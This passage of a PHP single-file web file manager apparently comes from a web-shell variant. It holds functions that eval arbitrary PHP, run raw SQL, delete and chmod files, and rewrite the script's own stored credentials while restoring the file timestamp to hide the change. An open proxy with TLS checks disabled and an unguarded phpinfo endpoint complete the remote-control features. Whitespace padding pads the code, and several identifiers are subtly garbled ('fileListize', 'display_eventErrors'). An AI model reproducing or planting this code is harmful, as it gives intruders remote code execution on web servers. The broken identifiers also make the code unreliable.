	                    	                    	                    $filemtime = filemtime(__FILE__);

	                    	                    	                    $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc_real);

	                    	                    	                    if (file_put_contents(__FILE__, $replace)) {

	                    	                    	                    	                    $msg_mx .= __('File updated');
          
	                    	                    	                    }	                    else $msg_mx .= __('Error occurred');

	                    	                    	                    if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);

	                    	                    }	                    

	                    	                    $lang = json_decode($translation_string,true);

	                    }

}

/* Functions */


//translation

function __($text){
                   
	                    global $lang;
	                    if (isset($lang[$text])) return $lang[$text];
          
	                    else return $text;

};


//delete fileList and dirs recursively

function fm_del_fileList($file, $recursive = false) {
	                    if($recursive && @is_dir($file)) {

	                    	                    $els = fm_scan_dir($file, '', '', true);

	                    	                    foreach ($els as $el) {

	                    	                    	                    if($el != '.' && $el != '..'){

	                    	                    	                    	                    fm_del_fileList($file . '/' . $el, true);
	                    	                    	                    }

	                    	                    }
                 
	                    }

	                    if(@is_dir($file)) {
	                    	                    return rmdir($file);

	                    } else {
             
	                    	                    return @unlink($file);
          
	                    }

}
           


//file perms
function fm_rights_string($file, $if = false){
                
	                    $perms = fileperms($file);
        
	                    $info = '';

	                    if(!$if){

	                    	                    if (($perms & 0xC000) == 0xC000) {
            
	                    	                    	                    //Socket
                    
	                    	                    	                    $info = 's';

	                    	                    } elseif (($perms & 0xA000) == 0xA000) {
	                    	                    	                    //Symbolic Link

	                    	                    	                    $info = 'l';

	                    	                    } elseif (($perms & 0x8000) == 0x8000) {

	                    	                    	                    //Regular

	                    	                    	                    $info = '-';

	                    	                    } elseif (($perms & 0x6000) == 0x6000) {

	                    	                    	                    //Block special

	                    	                    	                    $info = 'b';

	                    	                    } elseif (($perms & 0x4000) == 0x4000) {
               
	                    	                    	                    //Directory

	                    	                    	                    $info = 'd';

	                    	                    } elseif (($perms & 0x2000) == 0x2000) {

	                    	                    	                    //Character special
	                    	                    	                    $info = 'c';

	                    	                    } elseif (($perms & 0x1000) == 0x1000) {

	                    	                    	                    //FIFO pipe
              
	                    	                    	                    $info = 'p';
           
	                    	                    } else {
               
	                    	                    	                    //Unknown
        
	                    	                    	                    $info = 'u';

	                    	                    }
             
	                    }

  
                  
	                    //Owner
          
	                    $info .= (($perms & 0x0100) ? 'r' : '-');
                    
	                    $info .= (($perms & 0x0080) ? 'w' : '-');

	                    $info .= (($perms & 0x0040) ?

	                    (($perms & 0x0800) ? 's' : 'x' ) :

	                    (($perms & 0x0800) ? 'S' : '-'));

 

	                    //Group
	                    $info .= (($perms & 0x0020) ? 'r' : '-');
	                    $info .= (($perms & 0x0010) ? 'w' : '-');
	                    $info .= (($perms & 0x0008) ?
            
	                    (($perms & 0x0400) ? 's' : 'x' ) :

	                    (($perms & 0x0400) ? 'S' : '-'));
                    
 

	                    //World

	                    $info .= (($perms & 0x0004) ? 'r' : '-');
	                    $info .= (($perms & 0x0002) ? 'w' : '-');

	                    $info .= (($perms & 0x0001) ?

	                    (($perms & 0x0200) ? 't' : 'x' ) :

	                    (($perms & 0x0200) ? 'T' : '-'));
              


	                    return $info;

}


function fm_convert_rights($mode) {

	                    $mode = str_pad($mode,9,'-');
	                    $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');

	                    $mode = strtr($mode,$trans);
	                    $newmode = '0';

	                    $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 

	                    $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 

	                    $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 

	                    $newmode .= $owner . $group . $world;
	                    return intval($newmode, 8);
}


function fm_chmod($file, $val, $rec = false) {
	                    $res = @chmod(realpath($file), $val);
         
	                    if(@is_dir($file) && $rec){

	                    	                    $els = fm_scan_dir($file);
	                    	                    foreach ($els as $el) {

	                    	                    	                    $res = $res && fm_chmod($file . '/' . $el, $val, true);

	                    	                    }
            
	                    }
	                    return $res;

}


//load fileList

function fm_download($archiveFileName) {
    if (!empty($archiveFileName)) {

	                    	                    if (file_exists($archiveFileName)) {
          
	                    	                    	                    header("Content-Disposition: attachment; filename=" . basename($archiveFileName));   

	                    	                    	                    header("Content-Type: application/force-download");

	                    	                    	                    header("Content-Type: application/octet-stream");
                  
	                    	                    	                    header("Content-Type: application/download");
	                    	                    	                    header("Content-Description: File Transfer");            
	                    	                    	                    header("Content-Length: " . fileListize($archiveFileName));	                    	                    

	                    	                    	                    flush(); // this doesn't really matter.

	                    	                    	                    $fp = fopen($archiveFileName, "r");

	                    	                    	                    while (!feof($fp)) {

	                    	                    	                    	                    echo fread($fp, 65536);

	                    	                    	                    	                    flush(); // this is essential for large downloads

	                    	                    	                    } 
	                    	                    	                    fclose($fp);
         
	                    	                    	                    die();
                    
	                    	                    } else {

	                    	                    	                    header('HTTP/1.0 404 Not Found', true, 404);
           
	                    	                    	                    header('Status: 404 Not Found'); 

	                    	                    	                    die();

        }
                    
    } 
             
}



//show folder size

function fm_dir_size($f,$format=true) {
                
	                    if($format)  {

	                    	                    $size=fm_dir_size($f,false);
	                    	                    if($size<=1024) return $size.' bytes';

	                    	                    elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';
               
	                    	                    elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';

	                    	                    elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';
	                    	                    elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))
	                    	                    else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)
	                    } else {

	                    	                    if(is_file($f)) return fileListize($f);

	                    	                    $size=0;

	                    	                    $dh=opendir($f);
	                    	                    while(($file=readdir($dh))!==false) {

	                    	                    	                    if($file=='.' || $file=='..') continue;

	                    	                    	                    if(is_file($f.'/'.$file)) $size+=fileListize($f.'/'.$file);

	                    	                    	                    else $size+=fm_dir_size($f.'/'.$file,false);
             
	                    	                    }
	                    	                    closedir($dh);
	                    	                    return $size+fileListize($f); 
           
	                    }
}


                 
//scan directory

function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
          
	                    $dir = $ndir = array();
          
	                    if(!empty($exp)){
                 
	                    	                    $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	                    }
	                    if(!empty($type) && $type !== 'all'){

	                    	                    $func = 'is_' . $type;
             
	                    }

	                    if(@is_dir($directory)){
                   
	                    	                    $fh = opendir($directory);
	                    	                    while (false !== ($filename = readdir($fh))) {
             
	                    	                    	                    if(substr($filename, 0, 1) != '.' || $do_not_filter) {

	                    	                    	                    	                    if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){

	                    	                    	                    	                    	                    $dir[] = $filename;
	                    	                    	                    	                    }
	                    	                    	                    }
              
	                    	                    }

	                    	                    closedir($fh);
             
	                    	                    natsort($dir);
	                    }
	                    return $dir;

}



function fm_link($get,$link,$name,$title='') {
               
	                    if (empty($title)) $title=$name.' '.basename($link);

	                    return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}



function fm_arr_to_option($arr,$n,$sel=''){

	                    foreach($arr as $v){

	                    	                    $b=$v[$n];

	                    	                    $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
        
	                    }
                   
	                    return $res;
                
}


function fm_lang_form ($current='en'){

return '

<form name="change_lang" method="post" action="">
	                    <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >

	                    	                    <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
	                    	                    <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
	                    	                    <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>

	                    	                    <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>

	                    	                    <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
              
	                    </select>

</form>

';
}

	                    

function fm_root($dirname){
         
	                    return ($dirname=='.' OR $dirname=='..');
                   
}
                 


function fm_php($string){
	                    $display_eventErrors=ini_get('display_eventErrors');

	                    ini_set('display_eventErrors', '1');

	                    ob_start();
                  
	                    eval(trim($string));
	                    $text = ob_get_contents();
                   
	                    ob_end_clean();

	                    ini_set('display_eventErrors', $display_eventErrors);

	                    return $text;

}


//SHOW DATABASES
function fm_sql_connect(){

	                    global $fm_config;
	                    return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
                  
}


function fm_sql($query){

	                    global $fm_config;

	                    $query=trim($query);

	                    ob_start();

	                    $connection = fm_sql_connect();
                 
	                    if ($connection->connect_error) {

	                    	                    ob_end_clean();	                    

	                    	                    return $connection->connect_error;
	                    }
	                    $connection->set_charset('utf8');

    $queried = mysqli_query($connection,$query);
            
	                    if ($queried===false) {

	                    	                    ob_end_clean();	                    

	                    	                    return mysqli_error($connection);

    } else {

	                    	                    if(!empty($queried)){

	                    	                    	                    while($row = mysqli_fetch_assoc($queried)) {

	                    	                    	                    	                    $query_result[]=  $row;
	                    	                    	                    }

	                    	                    }

	                    	                    $vdump=empty($query_result)?'':var_export($query_result,true);	                    
	                    	                    ob_end_clean();	                    

	                    	                    $connection->close();

	                    	                    return '<pre>'.stripslashes($vdump).'</pre>';

	                    }
}

         
function fm_backup_tables($tables = '*', $full_backup = true) {

	                    global $path;

	                    $mysqldb = fm_sql_connect();

	                    $delimiter = "; \n  \n";

	                    if($tables == '*')	                    {
	                    	                    $tables = array();

	                    	                    $result = $mysqldb->query('SHOW TABLES');
                    
	                    	                    while($row = mysqli_fetch_row($result))	                    {

	                    	                    	                    $tables[] = $row[0];

	                    	                    }

	                    } else {
	                    	                    $tables = is_array($tables) ? $tables : explode(',',$tables);
	                    }

    
                 
	                    $return='';
                  
	                    foreach($tables as $table)	                    {

	                    	                    $result = $mysqldb->query('SELECT * FROM '.$table);
	                    	                    $num_fields = mysqli_num_fields($result);

	                    	                    $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;
	                    	                    $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));

	                    	                    $return.=$row2[1].$delimiter;

        if ($full_backup) {

	                    	                    for ($i = 0; $i < $num_fields; $i++)  {
        
	                    	                    	                    while($row = mysqli_fetch_row($result)) {

	                    	                    	                    	                    $return.= 'INSERT INTO `'.$table.'` VALUES(';

	                    	                    	                    	                    for($j=0; $j<$num_fields; $j++)	                    {

	                    	                    	                    	                    	                    $row[$j] = addslashes($row[$j]);

	                    	                    	                    	                    	                    $row[$j] = str_replace("\n","\\n",$row[$j]);
                    
	                    	                    	                    	                    	                    if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
	                    	                    	                    	                    	                    if ($j<($num_fields-1)) { $return.= ','; }

	                    	                    	                    	                    }
              
	                    	                    	                    	                    $return.= ')'.$delimiter;

	                    	                    	                    }

	                    	                      }
              
	                    	                    } else { 
               
	                    	                    $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);

	                    	                    }

	                    	                    $return.="\n\n\n";

	                    }


	                    //save file
    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';
	                    $handle = fopen($file,'w+');
	                    fwrite($handle,$return);

	                    fclose($handle);

	                    $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';

    return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}


function fm_restore_tables($sqlFileToExecute) {
         
	                    $mysqldb = fm_sql_connect();
	                    $delimiter = "; \n  \n";

    // Load and explode the sql file
    $f = fopen($sqlFileToExecute,"r+");

    $sqlFile = fread($f,fileListize($sqlFileToExecute));
    $sqlArray = explode($delimiter,$sqlFile);
	                    

    //Process the sql file by statements
           
    foreach ($sqlArray as $stmt) {

        if (strlen($stmt)>3){

	                    	                    	                    $result = $mysqldb->query($stmt);
	                    	                    	                    	                    if (!$result){

	                    	                    	                    	                    	                    $sqlErrorCode = mysqli_errno($mysqldb->connection);
                    
	                    	                    	                    	                    	                    $sqlErrorText = mysqli_error($mysqldb->connection);
	                    	                    	                    	                    	                    $sqlStmt      = $stmt;
         
	                    	                    	                    	                    	                    break;
           	                         }
           	                      }

           }

if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;

}


function fm_img_link($filename){

	                    return './'.basename(__FILE__).'?img='.base64_encode($filename);
}


function fm_home_style(){
	                    return '

input, input.fm_input {

	                    text-indent: 2px;
}



input, textarea, select, input.fm_input {

	                    color: black;
	                    font: normal 8pt Verdana, Arial, Helvetica, sans-serif;

	                    border-color: black;

	                    background-color: #FCFCFC none !important;
            
	                    border-radius: 0;

	                    padding: 2px;
}
               

          
input.fm_input {

	                    background: #FCFCFC none !important;
	                    cursor: pointer;

}


.home {
	                    background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg==");

	                    background-repeat: no-repeat;

}';

}


function fm_config_checkbox_row($name,$value) {

	                    global $fm_config;

	                    return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';

}

           
function fm_protocol() {

	                    if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';

	                    if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';

	                    if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';

	                    if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	                    return 'http://';
}


               
function fm_site_url() {
	                    return fm_protocol().$_SERVER['HTTP_HOST'];

}



function fm_url($full=false) {
	                    $host=$full?fm_site_url():'.';

	                    return $host.'/'.basename(__FILE__);
          
}
             

                   
function fm_home($full=false){
              
	                    return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
                  
}
               

                  
function fm_run_input($lng) {

	                    global $fm_config;

	                    $return = !empty($fm_config['enable_'.$lng.'_console']) ? 
	                    '

	                    	                    	                    	                    <form  method="post" action="'.fm_url().'" style="display:inline">

	                    	                    	                    	                    <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
	                    	                    	                    	                    </form>
                   
' : '';
                    
	                    return $return;
        
}
                    


function fm_url_proxy($matches) {
	                    $link = str_replace('&amp;','&',$matches[2]);
	                    $url = isset($_GET['url'])?$_GET['url']:'';
	                    $parse_url = parse_url($url);

	                    $host = $parse_url['scheme'].'://'.$parse_url['host'].'/';
            
	                    if (substr($link,0,2)=='//') {
	                    	                    $link = substr_replace($link,fm_protocol(),0,2);
                   
	                    } elseif (substr($link,0,1)=='/') {
                
	                    	                    $link = substr_replace($link,$host,0,1);	                    
                   
	                    } elseif (substr($link,0,2)=='./') {

	                    	                    $link = substr_replace($link,$host,0,2);	                    
                   
	                    } elseif (substr($link,0,4)=='http') {

	                    	                    //alles machen wunderschon
          
	                    } else {
          
	                    	                    $link = $host.$link;

	                    } 

	                    if ($matches[1]=='href' && !strripos($link, 'css')) {

	                    	                    $base = fm_site_url().'/'.basename(__FILE__);
                    
	                    	                    $baseq = $base.'?proxy=true&url=';

	                    	                    $link = $baseq.urlencode($link);
	                    } elseif (strripos($link, 'css')){
	                    	                    //как-то тоже подменять надо
              
	                    }

	                    return $matches[1].'="'.$link.'"';

}
                    
 

function fm_tpl_form($lng_tpl) {
	                    global ${$lng_tpl.'_templates'};
	                    $tpl_arr = json_decode(${$lng_tpl.'_templates'},true);

	                    $str = '';

	                    foreach ($tpl_arr as $ktpl=>$vtpl) {
        
	                    	                    $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
	                    }
return '

<table>
        
<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>

<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>

'.$str.'

<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>

</form>

<form method="post" action="">

<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
                
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
                  
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>
                   
</form>
              
</table>
                
';

}


        
function find_text_in_fileList($dir, $mask, $text) {
                
    $results = array();
    if ($handle = opendir($dir)) {

        while (false !== ($entry = readdir($handle))) {

            if ($entry != "." && $entry != "..") {

                $path = $dir . "/" . $entry;

                if (is_dir($path)) {

                    $results = array_merge($results, find_text_in_fileList($path, $mask, $text));

                } else {

                    if (fnmatch($mask, $entry)) {

                        $contents = file_get_contents($path);
            
                        if (strpos($contents, $text) !== false) {
                 
                            $results[] = str_replace('//', '/', $path);

                        }
                
                    }
                }

            }

        }

        closedir($handle);

    }
    return $results;

}
             


               
/* End Functions */
                    

// authorization

if ($auth_ok['authorize']) {
	                    if (isset($_POST['login']) && isset($_POST['password'])){
	                    	                    if (($_POST['login']==$auth_ok['login']) && ($_POST['password']==$auth_ok['password'])) {

	                    	                    	                    setcookie($auth_ok['cookie_name'], $auth_ok['login'].'|'.md5($auth_ok['password']), time() + (86400 * $auth_ok['days_authorization']));

	                    	                    	                    $_COOKIE[$auth_ok['cookie_name']]=$auth_ok['login'].'|'.md5($auth_ok['password']);
	                    	                    }
                 
	                    }
	                    if (!isset($_COOKIE[$auth_ok['cookie_name']]) OR ($_COOKIE[$auth_ok['cookie_name']]!=$auth_ok['login'].'|'.md5($auth_ok['password']))) {

	                    	                    echo '

<!doctype html>
<html>

<head>
                  
<meta charset="utf-8" />

<meta name="viewport" content="width=device-width, initial-scale=1" />

<title>'.__('File manager').'</title>

</head>

<body>
<form action="" method="post">

'.__('Login').' <input name="login" type="text">&nbsp;&nbsp;&nbsp;

'.__('Password').' <input name="password" type="password">&nbsp;&nbsp;&nbsp;
              
<input type="submit" value="'.__('Enter').'" class="fm_input">

</form>

'.fm_lang_form($language).'
               
</body>
</html>

';  
        
die();

	                    }
	                    if (isset($_POST['quit'])) {
           
	                    	                    unset($_COOKIE[$auth_ok['cookie_name']]);

	                    	                    setcookie($auth_ok['cookie_name'], '', time() - (86400 * $auth_ok['days_authorization']));

	                    	                    header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
	                    }
         
}


// Change config

if (isset($_GET['fm_settings'])) {
	                    if (isset($_GET['fm_config_delete'])) { 
             
	                    	                    unset($_COOKIE['fm_config']);

	                    	                    setcookie('fm_config', '', time() - (86400 * $auth_ok['days_authorization']));

	                    	                    header('Location: '.fm_url().'?fm_settings=true');

	                    	                    exit(0);
	                    }	                    elseif (isset($_POST['fm_config'])) { 

	                    	                    $fm_config = $_POST['fm_config'];
	                    	                    setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth_ok['days_authorization']));
	                    	                    $_COOKIE['fm_config'] = serialize($fm_config);
	                    	                    $msg_mx = __('Settings').' '.__('done');
                    
	                    }	                    elseif (isset($_POST['fm_login'])) { 
            
	                    	                    if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];

	                    	                    $fm_login = json_encode($_POST['fm_login']);
                 
	                    	                    $fgc_real = file_get_contents(__FILE__);
	                    	                    $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc_real, $matches);

	                    	                    if (!empty($matches[1])) {

	                    	                    	                    $filemtime = filemtime(__FILE__);

	                    	                    	                    $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc_real);
                   
	                    	                    	                    if (file_put_contents(__FILE__, $replace)) {

	                    	                    	                    	                    $msg_mx .= __('File updated');
	                    	                    	                    	                    if ($_POST['fm_login']['login'] != $auth_ok['login']) $msg_mx .= ' '.__('Login').': '.$_POST['fm_login']['login'];
                
	                    	                    	                    	                    if ($_POST['fm_login']['password'] != $auth_ok['password']) $msg_mx .= ' '.__('Password').': '.$_POST['fm_login']['password'];
	                    	                    	                    	                    $auth_ok = $_POST['fm_login'];

	                    	                    	                    }

	                    	                    	                    else $msg_mx .= __('Error occurred');

	                    	                    	                    if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);

	                    	                    }
                  
	                    } elseif (isset($_POST['tpl_edited'])) { 
	                    	                    $lng_tpl = $_POST['tpl_edited'];

	                    	                    if (!empty($_POST[$lng_tpl.'_name'])) {
	                    	                    	                    $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
	                    	                    } elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
                    
	                    	                    	                    $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);

	                    	                    }

	                    	                    if (!empty($fm_php)) {

	                    	                    	                    $fgc_real = file_get_contents(__FILE__);

	                    	                    	                    $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc_real, $matches);
                    
	                    	                    	                    if (!empty($matches[1])) {

	                    	                    	                    	                    $filemtime = filemtime(__FILE__);

	                    	                    	                    	                    $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc_real);

	                    	                    	                    	                    if (file_put_contents(__FILE__, $replace)) {
	                    	                    	                    	                    	                    ${$lng_tpl.'_templates'} = $fm_php;
             
	                    	                    	                    	                    	                    $msg_mx .= __('File updated');

	                    	                    	                    	                    } else $msg_mx .= __('Error occurred');

	                    	                    	                    	                    if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);

	                    	                    	                    }	                    

	                    	                    } else $msg_mx .= __('Error occurred');

	                    }

}


// Just show image
if (isset($_GET['img'])) {
                    
	                    $file=base64_decode($_GET['img']);

	                    if ($info=getimagesize($file)){
	                    	                    switch  ($info[2]){	                    //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP

	                    	                    	                    case 1: $ext='gif'; break;

	                    	                    	                    case 2: $ext='jpeg'; break;
	                    	                    	                    case 3: $ext='png'; break;
	                    	                    	                    case 6: $ext='bmp'; break;

	                    	                    	                    default: die();

	                    	                    }

	                    	                    header("Content-type: image/$ext");
	                    	                    echo file_get_contents($file);
	                    	                    die();
                    
	                    }

}

// Just download file
if (isset($_GET['download'])) {
                
	                    $file=base64_decode($_GET['download']);

	                    fm_download($file);	                    

}


// La seguridad es fundamental en este tipo de programas, garantizando la privacidad de los archivos

if (isset($_GET['phpinfo'])) {
	                    phpinfo(); 

	                    die();

}
            

         
// Mini proxy, many bugs!

if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {

	                    $url = isset($_GET['url'])?urldecode($_GET['url']):'';
                  
	                    $proxy_form = '

<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">

	                    <form action="" method="GET">
	                    <input type="hidden" name="proxy" value="true">

	                    '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">

	                    <input type="submit" value="'.__('Show').'" class="fm_input">

	                    </form>
                 
</div>
                 
';

	                    if ($url) {

	                    	                    $ch = curl_init($url);
                   
	                    	                    curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
                
	                    	                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

	                    	                    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
	                    	                    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
	                    	                    curl_setopt($ch, CURLOPT_HEADER, 0);

	                    	                    curl_setopt($ch, CURLOPT_REFERER, $url);

	                    	                    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
	                    	                    $result = curl_exec($ch);

	                    	                    curl_close($ch);
	                    	                    //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);

	                    	                    $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);

	                    	                    $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
        
	                    	                    echo $result;
             
	                    	                    die();
	                    } 

}

?>

<!doctype html>

<html>

<head>     

	                    <meta charset="utf-8" />
               
	                    <meta name="viewport" content="width=device-width, initial-scale=1" />

    <title><?=__('File manager')?></title>
<style>

body {
           
	                    background-color:	                    white;
	                    font-family:	                    	                    Verdana, Arial, Helvetica, sans-serif;

	                    font-size:	                    	                    	                    8pt;

	                    margin:	                    	                    	                    	                    0px;

}
         


a:link, a:active, a:visited { color: #006699; text-decoration: none; }
             
a:hover { color: #DD6900; text-decoration: underline; }

a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }



table.bg {
             
	                    background-color: #ACBBC6

}


           
th, td { 
	                    font:	                    normal 8pt Verdana, Arial, Helvetica, sans-serif;

	                    padding: 3px;
}

th	                    {

	                    height:	                    	                    	                    	                    25px;
            
	                    background-color:	                    #006699;

	                    color:	                    	                    	                    	                    #FFA34F;
           
	                    font-weight:	                    	                    bold;
	                    font-size:	                    	                    	                    11px;
}



.row1 {

	                    background-color:	                    #EFEFEF;

}


.row2 {

	                    background-color:	                    #DEE3E7;

}

          
.row3 {
            
	                    background-color:	                    #D1D7DC;
	                    padding: 5px;
}


                  
tr.row1:hover {

	                    background-color:	                    #F3FCFC;
            
}


tr.row2:hover {

	                    background-color:	                    #F0F6F6;

}



.whole {

	                    width: 100%;

}


                    
.all tbody td:first-child{width:100%;}
           

textarea {
	                    font: 9pt 'Courier New', courier;

	                    line-height: 125%;
	                    padding: 5px;

}


.textarea_input {
                  
	                    height: 1em;
                  
}



.textarea_input:focus {

	                    height: auto;
}



input[type=submit]{

	                    background: #FCFCFC none !important;

